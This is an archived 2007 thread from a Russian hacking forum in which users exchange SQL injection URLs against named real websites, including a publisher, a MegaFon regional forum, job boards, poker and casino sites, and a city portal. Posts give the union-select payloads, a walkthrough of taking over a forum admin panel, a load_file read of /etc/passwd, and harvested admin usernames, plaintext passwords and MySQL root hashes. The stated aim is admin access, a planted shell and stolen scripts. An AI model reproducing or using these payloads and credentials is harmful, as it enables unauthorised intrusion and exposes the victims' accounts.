ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
10.10.2007, 11:17
|
|
Новичок
Регистрация: 30.09.2007
Сообщений: 12
Провел на форуме:
59035
Репутация:
14
|
|
Народ, хелп, помогите заюзать сайтец, очень нужно узнать или доступ к админке или шелл залить..., основная цель - эт выкачать скрипты.
(Сайт дырявый как сито)
P.S ща вот сам колупаю, еси у кого получиться скидуйте сюда...
http://www.megaholl.com.ua/find_flat.php?a=1&d%5B%5D=16&d%5B%5D=21&d%5B%5D=22 &d%5B%5D=23&d%5B%5D=26&d%5B%5D=39))+union+select+u ser(),user(),3,4,5,6,user(),user(),user(),user(),u ser(),user(),13,14,15,16,17,18,19,20,21,22,23/*&sm=s1a&sr=n
или вот:
http://www.megaholl.com.ua/find_stead.php?a=2'
----------------------------------------------------------------------------
Вот версия мускула: http://www.megaholl.com.ua/4.1.22-standard/2.html
Вот так узнал версию:
http://www.megaholl.com.ua/find_stead.php?a=2)+union+select+version(),2,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*&sm=s1d&sr=t
Вот пользователь: http://www.megaholl.com.ua/u_megaholl@localhost/2.html
Во так узнал пользователя:
http://www.megaholl.com.ua/find_stead.php?a=2)+union+select+user(),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*&sm=s1d&sr=t
Вот БД:
http://www.megaholl.com.ua/megaholl/2.html
Вот так узнал имя ДБ:
http://www.megaholl.com.ua/find_stead.php?a=2)+union+select+database(),2,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3/*&sm=s1d&sr=t
Названия таблиц - немогу узнать, т.к пишет ошибка, но явная ошибка невысвечуеться (скрыто тут такое)
Вот для наглядности чтобы вы неискали где выводяться данные, я кстате случайно заметил, думал что там фильтруеться, ггг
Вот: http://www.megaholl.com.ua/find_stead.php?a=2)+union+select+database(),'wwwww wwwwwwwwwwwwwwww',3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23/*&sm=s1d&sr=t
Последний раз редактировалось FFFFx029A; 10.10.2007 в 11:43..
|
|
|
10.10.2007, 12:12
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
http://www.eskmo.ru/
Книжное издательство "Эксмо"
http://www1.eksmo.ru/catalog/book?b=-83262+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,VERSION(),22,23,24,25/*
|
|
|
|
10.10.2007, 14:01
|
|
Новичок
Регистрация: 30.09.2007
Сообщений: 12
Провел на форуме:
59035
Репутация:
14
|
|
Заюзать реально? (MSSQL)
http://www.reonline.ru/offers/556623.cnt?page=2&o_object=3'&o_type=1
|
|
|
|
10.10.2007, 14:29
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Админим форум Мегафона
Ну вобщем ничего сложного нет, поэтому выкладываю сюда, а там на рассмотрение модеров...
вобщем нашел скулю:
Код:
http://bashkortostan.megafonvolga.ru/payment/dealers/&dtype=2&caid=187+union+select+1,2,concat(user,':',password),4,5,6,7+from+mysql.user/*
я думаю все знают, что это такое, но воспользоваться этим не получится, так как на серваке открыт только 80 порт (HTTP)
увидел, что на серве есть форум (он относится, к всему мегафону поволжья), форум самописный, так, что пришлось воспользоваться интуицией и она меня не подвела:
Код:
http://bashkortostan.megafonvolga.ru/payment/dealers/&dtype=2&caid=187+union+select+1,2,3,4,5,6,7+from+forumusers/*
дальше пришлось подбирать поля, почти во всех подобных таблицах есть поле id, остается только найти префикс (ну или типа этого). Опять же интуиция вкупе с логикой не подвели:
Код:
http://bashkortostan.megafonvolga.ru/payment/dealers/&dtype=2&caid=187+union+select+1,2,fu_id,4,5,6,7+from+forumusers/*
дальше подбирать поля - дело техники и вот конечный результат:
Код:
http://bashkortostan.megafonvolga.ru/payment/dealers/&dtype=2&caid=187+union+select+1,2,concat(fu_name,':',fu_pwd),4,5,6,7+from+forumusers+where+fu_id=1/*
как видим пароль в чистом виде, логинимся на форуме и становимся админами... для того, что б войти в панель админа надо нажать на ссылку "аватары" вверху появится окно бейсик авторизации, в него вводим эти же логин/пасс и админим форум... все...
ЗЫ еще нашел там таблички: PPS логин/пароль форума подходит к магазину
__________________
Карфаген должен быть разрушен...
|
|
|
|
10.10.2007, 15:59
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286
Репутация:
187
|
|
Код:
http://www.butterslice.com/browsecats.php?cid=51%20union%20select%201,concat(sb_pwd,char(58),sb_pwd),3,4%20from%20sbjbs_admin/*
pcquestnb:Pcquestnb
Код:
http://www.ro-jobs.ro/browsecats.php?cid=48%20union%20select%201,concat(sb_admin_name,char(58),sb_pwd),3,4%20from%20sbjbs_admin/*
admin:q7w7e7r7
Код:
http://ph.jobcentralasia.com/browsecats.php?cid=46%20union%20select%201,concat(sb_admin_name,char(58),sb_pwd),3,4%20from%20sbjbs_admin/*
admin:qwertyuiop
Код:
http://www.buljob.com/search_result.php?cid=970000%20union%20select%201,concat(sb_admin_name,char(58),sb_pwd),3,4%20from%20sbjbs_admin/*
admin:I4ipBuOFUSuVaak2Y66* |
|
|
|
10.10.2007, 16:26
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753
Репутация:
552
|
|
Код:
http://www.host.uzip.uz/search_result.php?cid=-10+union+select+1,VERSION(),3,4/*
Код:
http://www.all-horse-classifieds.com/browsecats.php?cid=-26+union+select+1,VERSION(),3,4,5/*
Последний раз редактировалось SWAT; 10.10.2007 в 16:32..
|
|
|
|
10.10.2007, 16:45
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
офсайт города Бельцы 
код:
http://www.beltsy.md/modules.php?op=modload&name=Reviews&file=index&req =showcontent&id=-1+union+select+1,2,load_file(0x2f6574632f706173737 764),4,5,6,7,8,9,10,11,12+from+sedoi_users/*
__________________________________________________ __________
www.seejob.md
код:
http://www.seejob.md/?page=view&t=0&id=-36+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(table_name,0x3a,column_name),15,16,17,18,19,20, 21,22,23,24,25,26+from+information_schema.columns+ limit+1374,1/*
Последний раз редактировалось fobofob; 10.10.2007 в 20:41..
|
|
|
|
11.10.2007, 01:40
|
|
Banned
Регистрация: 06.10.2006
Сообщений: 288
Провел на форуме:
2741921
Репутация:
469
|
|
http://www.bmoca.org/artist.php?id=-1+union+select+1,2,3,4,CONCAT(username,0x3a,passwo rd),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25+from+users/*
http://www.bmoca.org/admin/
usename: bmoca
password: bm0c@
|
|
|
|
11.10.2007, 06:11
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
http://www.ur0mc.com/ru/photo.php?id=-1+union+select+1,version()/*
|
|
|
|
11.10.2007, 09:26
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Код:
http://www.dandbpoker.com/book_detail.php?id=-1/**/union/**/select/**/1,2,3,concat(user(),0x3a,version(),0x3a,data base()),5,6,7,8,9,10,11,12,13,14/*
harakis@server213-171-218-201.livedns.org.uk:4.1.22-standard-log:harakis
Код:
http://www.h-poker.com/newsitems/index.php?ticker=1&id=-1'/**/union/**/select/**/1,2,concat(user(),0x3a,version(),0x3 a,database()),4,5,6/*&parent=
mediamarket@localhost:5.0.33:mmg_hpoker
Код:
http://www.h-poker.com/newsitems/index.php?ticker=1&id=-1'/**/union/**/select/**/1,2,concat(user,0x3a,password),4,5 ,6+from+mys ql.user+limit+0,1/*&parent=
root:*E459468099CBA6AEE7E679233A154F2DA83C23F8
banker_wwwbanker:*29DDF7AB5EA8618C8CEE26BD2A4D734B 6E8307E1
mediamasters:*EB8A79A6B78AB470C3A37AAF085CEABAA5B6 6CF7
Код:
http://pokertut.com/newsitems/index.php?ticker=1&id=-1'/**/union/**/select/**/1,2,concat(user(),0x3a,versio n(),0x3a,database()),4, 5,6/*& parent=
mediamarket@localhost:5.0.33:mmg_pokertut
Код:
http://pokertut.com/newsitems/index.php?ticker=1&id=-1'/**/union/**/select/**/1,2,concat(user,0x3a,pa ssword),4,5,6 +from+mysql.us er/* &parent=
root:*E459468099CBA6AEE7E679233A154F2DA83C23F8
banker_wwwbanker:*29DDF7AB5EA8618C8CEE26BD2A4D734B 6E8307E1
mediamasters:*EB8A79A6B78AB470C3A37AAF085CEABAA5B6 6CF7
Код:
http://www.casino-fr-bonus.com/es/id.php?ID=-1+union+select+1,2,3,4,concat(user(),0x3a,vers ion(),0x3a,database()),6,7,8,9,10,11/*
user9718a@192.168.1.155:5.0.22-Debian_2-log:user9718a1
h*tp://www.grandscasinos.com /it/id.php?ID=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5,6,7,8,9,10,11/*
h*tp://www.casino-online-fr.com /ru/id.php?ID=-1+union+select+1,2,3,4,concat(user(),0x3a,version( ),0x3a,database()),6,7,8,9,10,11
h*tp://www.7casinoonline.com /it/es/id.php?ID=-1+union+select+1,2,3,4,concat(user(),0x3a,version( ),0x3a,database()),6,7,8,9,10,11
h*tp://www.equipodepoker.com /index.php ' or 1=1/*
h*tp://www.rakemeback.com /my-account/ ' or 1=1/* |
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Линейный вид
